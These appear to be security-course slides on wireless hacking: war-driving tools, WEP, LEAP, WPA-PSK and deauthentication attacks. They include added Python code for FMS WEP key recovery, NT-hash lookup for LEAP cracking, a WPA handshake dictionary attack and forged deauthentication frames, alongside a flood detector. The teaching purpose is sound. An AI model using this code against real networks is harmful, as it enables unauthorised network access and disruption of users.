Chapter 8 Wireless Hacking Last modified 3-27-09.

Post on 05-Jan-2016


Chapter 8

Wireless Hacking

Last modified 3-27-09

Equipment

Windows vs. Linux

Windows
– Wireless NIC drivers are easy to get
– Wireless hacking tools are few and weak

Unless you pay for AirPcap devices (link Ch 819) or OmniPeek

Linux
– Wireless NIC drivers are hard to get and install
– Wireless hacking tools are much better

OmniPeek

WildPackets now packages AiroPeek & EtherPeek together into OmniPeek

A Windows-based sniffer for wireless and wired LANs

Only supports a few wireless NICs
– See links Ch 801, Ch 802

Prism2 Chipsets

For Linux, the three best chipsets to use are Orinoco, Prism2.x/3, and Cisco
– Links Ch 803, 804, 805

Antennas

Omnidirectional antenna sends and receives in all directions

Directional antennas focus the waves in one direction
– The Cantenna shown is a directional antenna

Stacked Antennas

Quad stacked antenna
– Four omnidirectional antennas combined to focus the beam away from the vertical
– Beamwidth: 360° horizontal, 15° vertical
– Can go half a mile
– Link Ch 806

WISPer

Uses "multi-polarization" to send through trees and other obstructions
– Link Ch 807

Global Positioning System (GPS)

Locates you using signals from a set of satellites

Works with war-driving software to create a map of access points
– Link Ch 808

Pinpoint your Location with Wi-Fi (not in book)

Skyhook uses wardriving to make a database with the location of many Wi-Fi access points

Can locate any portable Wi-Fi device

An alternative to GPS
– Link Ch 809

iPhone

The iPhone combines GPS, Wi-Fi, and cell tower location technology to locate you
– Link Ch 820

You can wardrive with the Android phone and Wifiscan
– Links Ch 821-823

War-Driving Software

Terms

Service Set Identifier (SSID)
– The network name; every access point in one network advertises the same SSID (individual access points are told apart by the BSSID, the radio's MAC address)

Initialization Vector (IV)
– Part of a Wired Equivalent Privacy (WEP) packet
– A 24-bit value sent in the clear ahead of the ciphertext; it is prepended to the shared secret key to form the RC4 key that ciphers that packet's data

NetStumbler

Very popular Windows-based war-driving application

Analyzes the 802.11 header and IV fields of the wireless packet to find:
– SSID
– MAC address
– WEP usage and WEP key length (40 or 128 bit)
– Signal range
– Access point vendor

How NetStumbler Works

NetStumbler broadcasts 802.11 Probe Requests

All access points in the area send 802.11 Probe Responses containing network configuration information, such as their SSID and WEP status

It also uses a GPS to mark the positions of networks it finds
– Link Ch 810

NetStumbler Screen

NetStumbler Countermeasures

NetStumbler relies on the broadcast Probe Request (a probe request that names no SSID)

Wireless equipment vendors will usually offer an option to ignore such probe requests (the "closed" or "hidden" network setting), which effectively blinds NetStumbler
– But it doesn't blind Kismet, which listens passively instead of probing

Kismet

Linux and BSD-based wireless sniffer

Allows you to track wireless access points and their GPS locations like NetStumbler

Sniffs for 802.11 packets, such as Beacons and Association Requests
– Gathers IP addresses and Cisco Discovery Protocol (CDP) names when it can

Kismet Countermeasures
– There's not much you can do to stop Kismet from finding your network

Kismet Features

Windows version
– Runs on cygwin, only supports two types of network cards

Airsnort compatible weak-IV packet logging

Runtime decoding of WEP packets for known networks

Kismet Screenshot

For Kismet, see link Ch 811

Kismet Demo

– Use the Linksys WUSB54G ver 4 NICs
– Boot from the BackTrack 2 CD
– Start, Backtrack, Radio Network Analysis, 80211, All, Kismet

Wardriving

Finding wireless networks with a portable device
– Image from overdrawn.net

Vistumbler

Link Ch 818

Cain

WiGLE

Collects wardriving data from users

Has over 16 million records
– Link Ch 825

Wireless Scanning and Enumeration

Goal of Scanning and Enumeration
– To determine a method to gain system access

For wireless networks, scanning and enumeration are combined, and happen simultaneously

Wireless Sniffers

Not really any different from wired sniffers

There are the usual issues with drivers, and getting a card into monitor mode

Wireshark WiFi Demo

– Use the Linksys WUSB54G ver 4 NICs
– Boot from the BackTrack 2 CD
– In Konsole:

ifconfig rausb0 up

iwconfig rausb0 mode monitor

wireshark

iClicker Questions

Which antenna sends power most tightly focused in a single direction?

(answer choices A to D are antenna photos not reproduced in this transcript)

1 of 3

Which tool runs only on Linux?

A. NetStumbler  B. Kismet  C. Vistumbler  D. Cain  E. Wireshark

2 of 3

Which tool gives you the most complete information about every Wi-Fi frame sent?

A. NetStumbler  B. Kismet  C. Vistumbler  D. Cain  E. Wireshark

3 of 3

Identifying Wireless Network Defenses

SSID

SSID can be found from any of these frames
– Beacons: sent continually by the access point (the SSID field is left empty if SSID broadcast is disabled)
– Probe Requests: sent by client systems wishing to connect
– Probe Responses: response to a Probe Request
– Association and Reassociation Requests: made by the client when joining or rejoining the network

If SSID broadcasting is off, just send a deauthentication frame (spoofed as if from the access point) to a connected client to force a reassociation; the reassociation request carries the SSID in the clear
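The frames listed above, as an added example written for this page (not from the book or from NetStumbler or Kismet): a small parser that pulls the SSID element out of beacons, probe requests, probe responses and (re)association requests, plus a constructed capture in which one access point hides its SSID and a client reveals it in the frames that follow a deauthentication. The addresses, network names and frame contents are made up; NetStumbler-style active scanning produces the probe request/response pair, Kismet's passive sniffing relies on the beacon and association frames.

```python
"""Added example: where the SSID appears on the air (802.11 management frames)."""
import struct

BCAST = b"\xff" * 6
AP1 = bytes.fromhex("001122334455")       # constructed: AP with SSID broadcast disabled
AP2 = bytes.fromhex("66778899aabb")       # constructed: ordinary AP
STA = bytes.fromhex("0c0c0c0c0c0c")       # constructed: a client of AP1

SUBTYPES = {0: "assoc-req", 1: "assoc-resp", 2: "reassoc-req", 4: "probe-req",
            5: "probe-resp", 8: "beacon", 11: "auth", 12: "deauth"}
# Length of the fixed fields that precede the tagged parameters, per subtype
FIXED = {0: 4, 2: 10, 4: 0, 5: 12, 8: 12}


def mac(b):
    return ":".join(f"{x:02x}" for x in b)


def build_mgmt(subtype, dst, src, bssid, fixed, ssid):
    """Management frame: 24-byte header, fixed fields, then the SSID element (ID 0)."""
    hdr = struct.pack("<HH6s6s6sH", subtype << 4, 0, dst, src, bssid, 0)
    return hdr + fixed + bytes([0, len(ssid)]) + ssid


def parse_mgmt(frame):
    """Return subtype, addresses and SSID ('' = hidden, None = frame carries no SSID)."""
    fc, _dur, a1, a2, a3, _seq = struct.unpack_from("<HH6s6s6sH", frame)
    if (fc >> 2) & 3 != 0:
        return None                                   # not a management frame
    subtype = (fc >> 4) & 0xF
    info = {"subtype": SUBTYPES.get(subtype, str(subtype)), "dst": mac(a1),
            "src": mac(a2), "bssid": mac(a3), "ssid": None}
    if subtype not in FIXED:
        return info
    pos = 24 + FIXED[subtype]
    while pos + 2 <= len(frame):                      # walk the element list: id, len, value
        eid, ln = frame[pos], frame[pos + 1]
        if eid == 0:
            info["ssid"] = frame[pos + 2:pos + 2 + ln].decode("utf-8", "replace")
            break
        pos += 2 + ln
    return info


def learn_ssids(frames):
    """Passive discovery: BSSID -> SSID. A hidden beacon records '' until some frame names the net."""
    seen = {}
    for f in frames:
        m = parse_mgmt(f)
        if not m or m["ssid"] is None or m["bssid"] == mac(BCAST):
            continue                                  # probe requests name no BSSID
        if m["ssid"] or m["bssid"] not in seen:
            seen[m["bssid"]] = m["ssid"]
    return seen


def sample_capture():
    """Constructed frames in the order a sniffer might see them."""
    return [
        build_mgmt(8, BCAST, AP1, AP1, bytes(12), b""),          # beacon, SSID hidden
        build_mgmt(8, BCAST, AP2, AP2, bytes(12), b"guest"),     # beacon, SSID visible
        build_mgmt(4, BCAST, STA, BCAST, b"", b"CCSF-Lab"),      # client probes for the hidden net
        build_mgmt(5, STA, AP1, AP1, bytes(12), b"CCSF-Lab"),    # AP answers the directed probe
        build_mgmt(0, AP1, STA, AP1, bytes(4), b"CCSF-Lab"),     # association after a deauth
    ]


if __name__ == "__main__":
    for f in sample_capture():
        print(parse_mgmt(f))
    print(learn_ssids(sample_capture()))
```

Running it shows the hidden network listed with an empty name after the two beacons, and named once the client's probe response and association request have gone by; hiding the SSID only delays discovery until the next client connects.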

MAC Access Control

CCSF uses this technique

Each MAC must be entered into the list of approved addresses

High administrative effort, low security

Attacker can just sniff MACs from clients and spoof them

Gaining Access (Hacking 802.11)

Specifying the SSID

In Windows, just select it from the available wireless networks
– In Vista, right-click the network icon in the taskbar tray and click "Connect to a Network"
– If the SSID is hidden, click "Set up a connection or network" and then click "Manually connect to a wireless network"

Changing your MAC

Bwmachak changes a NIC under Windows for Orinoco cards

SMAC is easy
– link Ch 812

Device Manager

Many Wi-Fi cards allow you to change the MAC in Windows' Device Manager

Attacks Against the WEP Algorithm

Brute-force keyspace – takes weeks even for 40-bit keys

Collect Initialization Vectors, which are sent in the clear, and correlate them with the first encrypted byte
– The first plaintext byte of every WEP data frame is the LLC/SNAP value 0xAA, so the first keystream byte is known for every captured IV
– For the "weak" IVs identified by Fluhrer, Mantin and Shamir (FMS), that byte reveals one byte of the secret key about 5% of the time; enough weak IVs recover the whole key from captured traffic instead of brute-forcing the keyspace
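The weak-IV attack in code, as an added example written for this page (not from the book or from any tool on the next slide): a minimal WEP (RC4 keyed with IV || key, CRC-32 ICV), a constructed capture, and FMS recovery of a 40-bit key. The key, IVs and payload are made up. The attacker runs the RC4 key schedule only as far as the key bytes already known, keeps the IVs that satisfy the FMS "resolved condition", and lets each one vote for the next key byte; the vote is right about 5% of the time and noise otherwise, so the search walks the best-voted candidates and confirms a full key with one frame's ICV, which is what aircrack-ng's fudge factor does. To keep the run short the simulated access point emits only the (A+3, 255, X) class of weak IVs; about one in 13,000 random IVs falls in that class for a 5-byte key, which is why the real attack needs a large capture.

```python
"""Added example: WEP and the FMS weak-IV key recovery, with a constructed capture."""
import struct
import zlib

WEP_KEY = bytes.fromhex("5d1c3e7a9b")                     # constructed 40-bit key
SNAP = bytes.fromhex("aaaa030000000800")                   # LLC/SNAP: first plaintext bytes of a data frame


def rc4_ksa(key, steps=256):
    """RC4 key schedule; `steps` < 256 gives the partial state the attack reasons about."""
    s = list(range(256))
    j = 0
    for i in range(steps):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    return s, j


def rc4_keystream(key, n):
    s, _ = rc4_ksa(key)
    i = j = 0
    out = bytearray()
    for _ in range(n):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def wep_encrypt(key, iv, payload):
    """Frame body = IV(3, in the clear) | key id(1) | RC4_{IV||key}(payload | CRC-32 ICV)."""
    plain = payload + struct.pack("<I", zlib.crc32(payload) & 0xFFFFFFFF)
    ks = rc4_keystream(iv + key, len(plain))
    return iv + b"\x00" + bytes(p ^ k for p, k in zip(plain, ks))


def wep_decrypt(key, body):
    """Return the payload, or None if the ICV does not check (wrong key or tampering)."""
    iv, ct = body[:3], body[4:]
    ks = rc4_keystream(iv + key, len(ct))
    plain = bytes(c ^ k for c, k in zip(ct, ks))
    payload, icv = plain[:-4], struct.unpack("<I", plain[-4:])[0]
    return payload if zlib.crc32(payload) & 0xFFFFFFFF == icv else None


def fms_votes(known, captures):
    """Votes for key byte len(known); captures are (iv, first ciphertext byte) pairs."""
    a = len(known)
    votes = [0] * 256
    for iv, c0 in captures:
        s, j = rc4_ksa(iv + known, a + 3)                 # run the KSA as far as we know the key
        if s[1] >= a + 3 or (s[1] + s[s[1]]) & 0xFF != a + 3:
            continue                                      # not a "resolved" (weak) IV for this byte
        z = c0 ^ SNAP[0]                                  # first keystream byte, since plaintext[0] = 0xAA
        votes[(s.index(z) - j - s[a + 3]) & 0xFF] += 1    # right ~5% of the time, noise otherwise
    return votes


def crack_wep(captures, key_len, sample_body, width=8):
    """Depth-first search over the best-voted candidates; one frame's ICV confirms the key."""
    def search(prefix):
        if len(prefix) == key_len:
            return prefix if wep_decrypt(prefix, sample_body) is not None else None
        votes = fms_votes(prefix, captures)
        for b in sorted(range(256), key=lambda v: -votes[v])[:width]:
            hit = search(prefix + bytes([b]))
            if hit:
                return hit
        return None
    return search(b"")


def simulate_capture(key, key_len=5):
    """Constructed traffic: for every key byte index A, the FMS weak class (A+3, 255, X)."""
    payload = SNAP + b"constructed-ip-packet"
    bodies = [wep_encrypt(key, bytes([a + 3, 255, x]), payload)
              for a in range(key_len) for x in range(256)]
    return [(b[:3], b[4]) for b in bodies], bodies[0]


if __name__ == "__main__":
    captures, one_frame = simulate_capture(WEP_KEY)
    print("recovered key:", crack_wep(captures, 5, one_frame).hex())
```

The attacker never touches the secret directly: every vote is computed from the public IV, the first ciphertext byte, and the key bytes already recovered, which is why the attack is passive and why a 104-bit key only means more rounds of the same loop rather than a different attack.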

Tools that Exploit WEP Weaknesses

AirSnort

WLAN-Tools

DWEPCrack

WEPAttack
– Cracks using the weak IV flaw

Best countermeasure – use WPA

HotSpotter

Hotspotter – like SSLstrip, it silently replaces a secure WiFi connection with an insecure one

Works because Windows allows it, apparently happy to accept an insecure network as part of the same WLAN
– Link Ch 824

Lightweight Extensible Authentication Protocol (LEAP)

What is LEAP?

A proprietary protocol from Cisco Systems developed in 2000 to address the security weaknesses common in WEP

LEAP is an 802.1X scheme using a RADIUS server

As of 2004, 46% of IT executives in the enterprise said that they used LEAP in their organizations

The Weakness of LEAP

LEAP is fundamentally weak because it provides zero resistance to offline dictionary attacks

It solely relies on MS-CHAPv2 (Microsoft Challenge Handshake Authentication Protocol version 2) to protect the user credentials used for Wireless LAN authentication

MS-CHAPv2

MS-CHAPv2 is notoriously weak because
– It does not use a salt in its NT hashes
– The 16-byte NT hash is split into three DES keys of 7, 7 and 2 bytes; the 2-byte key (padded with zeros) falls to 65,536 trials, which leaks the last two bytes of the hash
– Sends usernames in clear text

Because of this, offline dictionary and brute-force attacks can be made much more efficient by a very large (4 gigabytes) database of likely passwords with pre-calculated hashes
– Rainbow tables
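The precomputation the slide describes, as an added example (not asleap's code): the NT hash is MD4 of the UTF-16LE password with no salt, so one table serves every user on every network. asleap first brute-forces the 2-byte third DES key of the response to learn the last two bytes of the NT hash; that step needs DES and is taken as given here, the two tail bytes are simply passed in. MD4 is written out because hashlib's md4 is missing on builds without OpenSSL's legacy provider. The wordlist is constructed.

```python
"""Added example: unsalted NT hashes and the precomputed table asleap consults."""
import struct

MASK = 0xFFFFFFFF


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK


def md4(data):
    """RFC 1320 MD4, enough for NT hashes (hashlib's md4 is not always available)."""
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    msg = data + b"\x80" + b"\x00" * ((55 - len(data)) % 64) + struct.pack("<Q", 8 * len(data))
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    h = lambda x, y, z: x ^ y ^ z
    rounds = (
        (f, 0, [3, 7, 11, 19], list(range(16))),
        (g, 0x5A827999, [3, 5, 9, 13], [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15]),
        (h, 0x6ED9EBA1, [3, 9, 11, 15], [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15]),
    )
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for func, k, shifts, order in rounds:
            for i, idx in enumerate(order):        # registers rotate: the new value becomes "b"
                a, b, c, d = d, _rotl((a + func(b, c, d) + x[idx] + k) & MASK, shifts[i % 4]), b, c
        a, b, c, d = (a + aa) & MASK, (b + bb) & MASK, (c + cc) & MASK, (d + dd) & MASK
    return struct.pack("<4I", a, b, c, d)


def nt_hash(password):
    """NT hash = MD4(UTF-16LE(password)); no salt, no iteration count."""
    return md4(password.encode("utf-16le"))


def build_index(wordlist):
    """One-off precomputation keyed by the hash's last two bytes: the bytes asleap recovers
    by brute-forcing the 2-byte third DES key of the MS-CHAPv2 response."""
    index = {}
    for pw in wordlist:
        index.setdefault(nt_hash(pw)[14:16], []).append(pw)
    return index


def candidates(index, tail):
    """Passwords whose NT hash ends in `tail`; the full DES response check then confirms one."""
    return index.get(tail, [])


# constructed wordlist; a real one has millions of entries and is built once
WORDLIST = ["password", "Password1", "letmein", "ccsf2009", "Summer09!", "qwerty", "cisco123"]

if __name__ == "__main__":
    idx = build_index(WORDLIST)
    print(nt_hash("password").hex())
    print(candidates(idx, nt_hash("letmein")[14:16]))
```

Because nothing per-user or per-session enters the hash, the same index answers every captured exchange; a salted or iterated scheme would force the attacker to redo the whole table for each target.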

Cisco's Defense

LEAP is secure if the passwords are long and complex
– 10 characters long with random upper case, lower case, numeric, and special characters

The vast majority of passwords in most organizations do not meet these stringent requirements
– Can be cracked in a few days or even a few minutes

For more info about LEAP, see link Ch 813

LEAP Attacks

Anwrap

Performs a dictionary attack on LEAP

Written in Perl, easy to use

Asleap

Captures LEAP challenge/response exchanges between Cisco wireless access points and their clients and recovers weak passwords offline

Integrated with Air-Jack to knock authenticated wireless users off targeted wireless networks
– When the user reauthenticates, their challenge/response will be sniffed and the password cracked with Asleap

Countermeasures for LEAP

Enforce strong passwords

Continuously audit the services to make sure people don't use poor passwords

WPA

WPA is strong

No major weaknesses

However, if you use a weak Pre-Shared Key, it can be found with an offline dictionary attack against one captured four-way handshake

Tool: Aircrack-ng
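The dictionary attack as an added example (not aircrack-ng's code; Python standard library only): the PSK is PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds); the PTK is derived from the PSK, both MAC addresses and both nonces of the four-way handshake; its first 16 bytes (the KCK) key the MIC on EAPOL message 2. An attacker who captured that one message tries passphrases until the MIC matches. The network name, addresses, nonces, passphrase and wordlist are constructed; the EAPOL frame uses RSN key descriptor version 2 (HMAC-SHA1-128 MIC) and carries no key data, where a real frame would carry the RSN information element.

```python
"""Added example: offline dictionary attack on a captured WPA/WPA2-PSK four-way handshake."""
import hashlib
import hmac
import struct

SSID = b"CCSF-Lab"                                        # constructed network name
AP = bytes.fromhex("001122334455")                        # authenticator address (constructed)
STA = bytes.fromhex("0c0c0c0c0c0c")                       # supplicant address (constructed)
ANONCE, SNONCE = bytes(range(32)), bytes(range(32, 64))   # constructed nonces
WORDLIST = ["password", "12345678", "letmein1", "ccsfwifi", "sunflower", "wireless"]  # constructed


def psk(passphrase, ssid):
    """802.11i: PSK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid, 4096, 32)


def ptk(pmk, aa, spa, anonce, snonce):
    """PRF-512(PMK, "Pairwise key expansion", min/max of the addresses and nonces)."""
    b = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    out = b"".join(hmac.new(pmk, b"Pairwise key expansion\x00" + b + bytes([i]), hashlib.sha1).digest()
                   for i in range(4))
    return out[:64]                                       # KCK = [0:16], KEK = [16:32], TK = [32:48]


def eapol_msg2(snonce, mic=bytes(16)):
    """EAPOL-Key message 2: RSN descriptor (type 2), key info 0x010a (version 2, pairwise, MIC set),
    key length 16, replay counter 1, empty key data."""
    body = struct.pack(">BHH8s32s16s8s8s16sH", 2, 0x010A, 16, struct.pack(">Q", 1), snonce,
                       bytes(16), bytes(8), bytes(8), mic, 0)
    return struct.pack(">BBH", 2, 3, len(body)) + body    # 802.1X header: version 2, type EAPOL-Key


def eapol_mic(kck, frame):
    """Descriptor version 2: HMAC-SHA1 over the EAPOL frame with the MIC field zeroed, truncated to 16."""
    return hmac.new(kck, frame[:81] + bytes(16) + frame[97:], hashlib.sha1).digest()[:16]


def supplicant_msg2(passphrase):
    """What the client transmits: message 2 carrying a valid MIC under the real passphrase."""
    kck = ptk(psk(passphrase, SSID), AP, STA, ANONCE, SNONCE)[:16]
    return eapol_msg2(SNONCE, eapol_mic(kck, eapol_msg2(SNONCE)))


def crack_psk(frame, anonce, wordlist, ssid=SSID, aa=AP, spa=STA):
    """The aircrack-ng loop: one PBKDF2 (4096 SHA-1 rounds) per guess, valid for this SSID only."""
    snonce, mic = frame[17:49], frame[81:97]
    for guess in wordlist:
        kck = ptk(psk(guess, ssid), aa, spa, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, frame), mic):
            return guess
    return None


if __name__ == "__main__":
    captured = supplicant_msg2("sunflower")
    print(crack_psk(captured, ANONCE, WORDLIST))
```

Everything the loop needs (SSID, both addresses, both nonces, the MIC) is in the clear in the handshake, so the only cost per guess is the PBKDF2, and the SSID acting as salt means a precomputed table only helps against networks with that exact name.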

Denial of Service (DoS) Attacks

Radio Interference
– 802.11b and 11g use the 2.4-2.5 GHz ISM band, which is extremely crowded at the moment (802.11a uses the 5 GHz band, which is less crowded)

Unauthenticated Management Frames
– An attacker can spoof a deauthentication frame that looks like it came from the access point
– wlan_jack in the Air-Jack suite does this
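A forged deauthentication as an added example (not wlan_jack's code): the frame is a 24-byte header plus a 2-byte reason code and, without 802.11w protected management frames, contains nothing that ties it to the access point beyond the address fields the attacker fills in. The second half is the detection side: a sliding-window counter over (timestamp, frame) pairs that flags a BSSID sourcing more deauthentications per second than a real access point would. Addresses, timestamps and the threshold are constructed.

```python
"""Added example: a spoofed deauthentication frame and a simple flood detector."""
import struct
from collections import defaultdict, deque

BCAST = b"\xff" * 6
AP = bytes.fromhex("001122334455")        # constructed BSSID
STA = bytes.fromhex("0c0c0c0c0c0c")       # constructed client


def mac(b):
    return ":".join(f"{x:02x}" for x in b)


def deauth_frame(dst, src, bssid, reason, seq):
    """Type 0 / subtype 12. Address 2 is the only hint of who sent it, and it is just a field."""
    fc = 12 << 4
    hdr = struct.pack("<HH6s6s6sH", fc, 0x013A, dst, src, bssid, seq << 4)
    return hdr + struct.pack("<H", reason)


def parse_deauth(frame):
    fc, _dur, dst, src, bssid, seq = struct.unpack_from("<HH6s6s6sH", frame)
    if (fc >> 2) & 3 != 0 or (fc >> 4) & 0xF != 12:
        return None                       # not a deauthentication frame
    return {"dst": mac(dst), "src": mac(src), "bssid": mac(bssid),
            "seq": seq >> 4, "reason": struct.unpack_from("<H", frame, 24)[0]}


class DeauthFloodDetector:
    """Sliding window per BSSID: more than `threshold` deauths in `window` seconds is a flood."""

    def __init__(self, threshold=10, window=1.0):
        self.threshold, self.window = threshold, window
        self.recent = defaultdict(deque)  # bssid -> timestamps still inside the window

    def observe(self, ts, frame):
        d = parse_deauth(frame)
        if d is None:
            return False
        q = self.recent[d["bssid"]]
        q.append(ts)
        while ts - q[0] > self.window:
            q.popleft()
        return len(q) > self.threshold


def flood_sources(capture):
    """BSSIDs that the detector flags at least once over a list of (timestamp, frame)."""
    det = DeauthFloodDetector()
    return {parse_deauth(f)["bssid"] for ts, f in capture if det.observe(ts, f)}


def sample_capture():
    """Constructed: one legitimate deauth at t=0 (reason 2, previous authentication no longer
    valid), then an Air-Jack style flood of 40 broadcast deauths in 0.4 s with the AP's address forged."""
    legit = [(0.0, deauth_frame(STA, AP, AP, 2, 1))]
    flood = [(5.0 + i * 0.01, deauth_frame(BCAST, AP, AP, 7, 200 + i)) for i in range(40)]
    return legit + flood


if __name__ == "__main__":
    for ts, f in sample_capture()[:3]:
        print(ts, parse_deauth(f))
    print(flood_sources(sample_capture()))
```

The forged frames and the genuine one come out of the same function with the same bytes, which is the whole problem: a client cannot tell them apart, so the practical defences are rate-based detection like this or 802.11w, which adds a MIC to management frames.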

iClicker Questions

Which Cisco proprietary wireless security protocol is vulnerable, but still widely used?

A. WPA2  B. WPA  C. LEAP  D. WEP  E. MAC Address Filtering

1 of 4

Which wireless security protocol is the weakest, vulnerable to a trivial sniffing attack?

A. WPA2  B. WPA  C. LEAP  D. WEP  E. MAC Address Filtering

2 of 4

Which wireless security protocol is vulnerable to DoS via deauthentication frame injection?

A. WPA2  B. WPA  C. LEAP  D. WEP  E. All of the above

3 of 4

Which wireless security protocol requires the most administrative effort to implement and maintain?

A. WPA2  B. WPA  C. LEAP  D. WEP  E. MAC Address Filtering

4 of 4